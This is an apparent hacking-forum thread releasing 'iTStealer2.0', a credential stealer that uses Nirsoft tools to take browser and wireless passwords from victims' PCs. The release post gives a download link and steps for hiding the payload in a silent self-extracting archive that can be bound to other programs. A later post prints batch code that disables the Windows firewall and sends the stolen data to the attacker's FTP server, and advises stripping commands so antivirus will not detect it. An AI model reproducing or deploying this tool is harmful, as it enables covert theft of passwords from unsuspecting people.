iTStealer2.0

[iTpHo3NiX]

Hello all. Ok well this is my first AutoIt Script which I used in conjunction with my new stealer script. I Though I would release it more app like... Anyways whats the differance?

Changelog

• Nirsoft Downloader
• FTP Information Generator *No batch scripting knowledge required*
• Melts Completely
• Cleans up after itself better (completely this time)

Any questions or comments please PM/Email/Post here



Now there is also a new source for the stealer.bat to implement the changes

Download (Source in SRC folder):
http://upload.evilzone.org/download.php?id=387203&type=rar

How to use:

1. Run iTStealer2.0.exe and select File-->Open
2. Select the stealer batch file
3. Edit the Server, Username, and Password information
4. Press OK and update the file
5. Close
6. Add iTStealer2.0.bat, ea-rce.dll, ea-rce.exe, start.vbs, and wget.exe into a self extracting archive.
7. Go to Advanced and edit SFX Options
8. In the "Path to extract" type in "%temp%\stealer"
9. In the "Run after extraction" type in "%temp%\stealer\start.vbs"
10. Under the Modes tab, select "Hide All" and under update then select "Overwrite All Files"
11. Then press Ok and Enjoy... You can then bind with other programs or whatever you want

[Infinityexists]

Virus Found BAT/Killwin in your iTStealer file .

btw, whose Ftp details should we provided ? , sorry for being an idiot.

and what it actually do ?

[Kulverstukas]

Being an idiot is not an excuse to stupid questions.
You must provide your FTP details obviously. This is also not a virus - itphoenix is a respected member, I can assure you he wouldn't infect anyone...

And this as I recall steals information from the computer using Nirsoft utilities.

[Infinityexists]

I've successfuly generated a file but on running , it doesn't upload any thing on my FTP server :S i provided everything correctly.

What the problem ?

[ande]

I've successfuly generated a file but on running , it doesn't upload any thing on my FTP server :S i provided everything correctly.

What the problem ?

Filepermissions perhaps?

[Axon]

This looks great, but the author didn't specify which kind of passwords this tool can steal

[Infinityexists]

file permission is not an issue because i created a VBscript program to upload file to server and it is working fine,
There is some issue in your stealer and i think nirsoft apps that you are using are outdated, i manually downloaded each of them and save passwords inside chrome/mozilla but nirsoft password detector hasn't detect any of them

[Infinityexists]

This looks great, but the author didn't specify which kind of passwords this tool can steal

This tool steals chrome, firefox, ie, Wireless passwords from the victims pc and upload them to your server

[ande]

file permission is not an issue because i created a VBscript program to upload file to server and it is working fine,
There is some issue in your stealer and i think nirsoft apps that you are using are outdated, i manually downloaded each of them and save passwords inside chrome/mozilla but nirsoft password detector hasn't detect any of them

Then you must have miss configured it. Iirc, this stealer downloads the newest versions but i could be wrong.

Also, dont double post. You can edit your previous post instead.

[Infinityexists]

Then you must have miss configured it. Iirc, this stealer downloads the newest versions but i could be wrong.

Also, dont double post. You can edit your previous post instead.

I've done everything absolutely correct but still it doesn't work,
and yes this stealer downloads the newest versions of nirsoft from their website

[iTpHo3NiX]

My breakdown goes more into depth but I will explain a few things. The FTP transfer part are these lines:

Code: [Select]

:disablefirewall
netsh firewall set opmode disable

:ftpinfo
echo open ftpserver>ftp.iTp
echo user ftpusername>>ftp.iTp
echo ftppassword>>ftp.iTp
echo send %USERNAME%-%num%.txt>>ftp.iTp
echo bye>>ftp.iTp

:ftptransfer
ftp.exe -n -i -s:c:\steal\ftp.iTp
The GUI is meant to simplify things, but it may just complicate things. You can change the variables in there.

As for it being outdated, you are incorrect it always downloads the latest nirsoft tools from the server.

The virus that is detected is the commands used to disable viruses. 9/10 times it doesn't work so it can be removed to make it undetectable.

The issue you might be having is depending if your using a firewall that blocks outgoing ftp transfers. This stealer is simple and only disables the Windows Firewalls.

The main purpose of this batch file is to show what you can do with a batch file and take information from one of the most insecure operating systems known to man. Windows gives you a text editor and the ability to create and run batch files that could give a hacker knowledge of the system and gain access to private information.